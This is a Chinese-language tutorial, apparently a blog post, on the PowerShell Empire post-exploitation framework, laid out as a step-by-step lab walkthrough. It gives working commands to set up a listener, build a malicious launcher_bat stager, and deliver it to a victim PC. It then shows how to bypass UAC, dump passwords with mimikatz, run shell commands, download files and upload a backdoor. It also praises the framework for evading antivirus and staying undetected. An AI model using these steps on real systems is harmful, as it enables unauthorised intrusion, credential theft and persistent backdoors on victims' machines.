0x01 簡介
Empire是一個后滲透攻擊框架。它是一個純粹的PowerShell代理,具有加密安全通信和靈活架構的附加功能。Empire具有在不需要PowerShell.exe的情況下執行PowerShell代理的方法。它可以迅速采用可后期利用的模塊,涵蓋范圍廣泛,從鍵盤記錄器到mimikatz等。這個框架是PowerShell Empire和Python Empire項目的組合; 這使得它用戶友好和方便。PowerShell Empire於2015年問世,Python Empire於2016年問世。它類似於Metasploit和Meterpreter。但由於它是命令和控制工具,它允許您更有效地控制PC。
PowerShell提供了豐富的攻擊性優勢,進一步包括.NET的全部訪問,applock白名單以及對Win32的直接訪問。它還在內存中構建惡意二進制文件。它提供C2功能,允許您在第一階段之后植入第二階段。它也可以用於橫向移動。它與其他框架相比發展迅速,且非常方便。此外,由於它不需要PowerShell.exe,它可以讓您繞過反病毒。因此,最好使用PowerShell Empire。
0x02 功能
listenter:監聽器是一個從我們正在攻擊的機器上偵聽連接的進程。這有助於Empire將戰利品發回攻擊者的計算機。
Stager: stager是一段代碼,允許我們的惡意代碼通過受感染主機上的代理運行。
proxy:代理是一種程序,用於維護計算機與受感染主機之間的連接。
module:執行我們的惡意命令,這些命令可以收集憑據並升級我們的權限。
0x03 安裝
使用以下命令下載它:
下載完成並完成后,請按照下面給出的步驟進行安裝:
cd Empire/
cd setup/
./install.sh
安裝完成后,移回Empire目錄並使用./empire運行empire
現在使用help命令,因為它打開了最初所需的所有基本選項。
(Empire) > help
Commands
========
agents Jump to the Agents menu. # 跳轉到代理菜單
creds Add/display credentials to/from the database. # 從數據庫中添加/顯示憑據
exit Exit Empire
help Displays the help menu.
interact Interact with a particular agent. # 與特定的代理交互
list Lists active agents or listeners. # 列出活動代理或偵聽器
listeners Interact with active listeners. # 與活躍的會話互動
load Loads Empire modules from a non-standard folder. # 從非標准文件夾加載Empire模塊
plugin Load a plugin file to extend Empire. # 加載插件文件以擴展Empire
plugins List all available and active plugins. # 列出所有可用的和活動的插件
preobfuscate Preobfuscate PowerShell module_source files # 預混淆PowerShell模塊源文件
reload Reload one (or all) Empire modules. # 重新加載一個或多個Empire模塊
report Produce report CSV and log files: sessions.csv, credentials.csv, master.log
# 生成CSV報告和日志文件
reset Reset a global option (e.g. IP whitelists). # 重置一個全局的選項
resource Read and execute a list of Empire commands from a file. # 從文件中讀取並執行Empire命令列表
searchmodule Search Empire module names/descriptions. # 搜索帝國模塊名稱/描述
set Set a global option (e.g. IP whitelists). # 設置全局選項
show Show a global option (e.g. IP whitelists). # 顯示全局選項
usemodule Use an Empire module. # 使用一個Empire模塊
usestager Use an Empire stager. # 使用一個Empire代碼段
根據工作流程,首先,我們必須在本地機器上創建一個監聽器。
listeners 查看活動的偵聽器
進入監聽器界面輸入以下命令查看所有可用的偵聽器
(Empire: listeners) > uselistener <tab> <tab>
dbx http_com http_hop meterpreter redirector
http http_foreign http_mapi onedrive
最流行和最常用的偵聽器是http
uselistener http
此命令在本地端口80上創建一個偵聽器。如果端口80已經被像Apache這樣的服務占用,請確保停止該服務,因為此偵聽器是http偵聽器只能在端口80上工作。
查看偵聽器下可以使用的命令
(Empire: listeners) > <tab><tab>
agents delete enable info list resource
back disable exit kill listeners uselistener
creds edit help launcher main usestager
如果要刪除一個活躍的listener,使用kill命令
(Empire: listeners) > kill http
[!] Killing listener 'http'
現在要查看所有你應該在這個監聽器類型中提供的選項:
info
正如上圖所示,你可以使用各種設置來修改或自定義偵聽器。我們可以嘗試更改我們的監聽器的名稱,這樣有助於記住所有被激活的監聽器;
set Name test
上面的命令會將偵聽器的名稱從http更改為test。
通常,此偵聽器會自動占用本地主機IP,但為了以防萬一,你可以使用以下命令設置IP:
set Host 192.168.88.152
execute
上面的命令將執行監聽器。然后返回並使用PowerShell偵聽器
現在輸入'back'以從監聽器接口返回,以便我們可以執行我們的模塊。使用以下命令查看Empire提供的所有模塊:
(Empire: listeners/http) > back
(Empire: listeners) > usestager <tab> <tab>
正如圖中所示,Windows和IOS都有很多模塊,還有一些可以在任何平台上使用的多模塊。以下實驗,我們將使用launcher_bat創建惡意軟件並利用受害者的PC。
usestager windows/launcher_bat
然后再次鍵入“info”以查看漏洞利用所需的所有設置。經過檢查,發現我們只需要提供listener。
set Listener test
execute
在設置偵聽器測試並創建/tmp/launcher.bat之后,上述兩個命令將執行我們的漏洞利用。使用python服務器在受害者的PC中執行此文件。
python -m SimpleHTTPServer 8080
當文件將執行時,您將有一個會話。要檢查您的會話類型:
agents
使用上面的命令,您可以看到已激活會話。您可以更改會話的名稱,因為默認情況下給出的名稱非常復雜且難以記住。為此,請鍵入:
rename P4BNYW6D pc01
使用以下命令訪問會話:
interact pc01
獲得對會話的訪問權限后,請嘗試使用以下命令獲取管理會話:
bypassuac http
執行bypassuac命令后,將打開另一個會話。鍵入以下內容重命名該會話:
rename HE3K45LN admin01
interact with admin01 now.
interact admin01
<tab> <tab>幫助我們查看shell中的所有選項。有幾種選擇對后期開發很有幫助。如信息,工作,列表等,如圖所示。
信息: 所有基本細節,如IP,隨機數,抖動,完整性等。
現在,如果使用'help'命令,您將能夠看到所有可執行命令。
讓我們嘗試運行 mimikatz 來獲取用戶的密碼。由於 mimikatz 不能在普通的guest用戶shell上運行,並且只能在admin shell上運行; 這也證明我們必須實現管理員訪問權限,以便我們可以使用mimikatz。
Hmmmm!用戶的密碼為“123456”。
creds
上面的命令也會在明文及其哈希中轉儲任何用戶的憑據或密碼。
另一個重要的命令是 shell 命令。
要使用受害者的shell運行正確的Microsoft Windows命令,我們使用此功能。
例如:一個這樣的窗口的cmd only命令是 netstat
shell netstat -ano
正如預期的那樣,上面的命令向我們展示了機器上當前工作的所有端口!
現在,因為windows中的默認shell目錄是“ C:/ windows / system32 ”; 讓我們嘗試移動到另一個目錄並嘗試從那里下載一些文件,我們也可以在該位置上傳一些內容,例如,我們可以上傳后門!現在,使用以下命令:
shell cd C:\Users\lihui03\Desktop
shell dir
download msf.pdf
上面的命令將從窗口的桌面下載一個名為msf.pdf的圖像到“帝國的下載目錄”
在這里我們可以上傳任何后門,在上面的命令的幫助下,我們從Kali的桌面上傳一個后門到受害者的桌面,我們甚至可以調用這個文件,因為我們有shell訪問權限!
upload /root/shell.hta
這是下載文件的位置:
查看上傳的文件
上面的命令證明我們確實已經上傳了shell.hta
之前展示的是基本演示及其使用的不同術語以及如何使用它們。還有另一個術語,即usemodule。最后,讓我們看看如何使用它。
該命令將顯示所有可用模塊並可供使用,如下圖所示:
以下是如何使用usemodule的小型演示。類型:
usemodule trollsploit/message
set MsgText you have been hacked
execute
y
使用上述模塊將在受害者的PC上顯示一條消息,如下圖所示:
目標機器上是這樣的!!!
結論
惡意軟件以.exe / dll / hta等形式允許攻擊者構建任何理想的攻擊,因為此框架可以訪問Win32。雖然反病毒公司日益知曉,但這些公司仍然有效。由於其廣泛,真實和有效的后漏洞收集,它是一個偉大的工具。最終,目標是在攻擊中未被發現並成功,這個工具允許我們這樣做。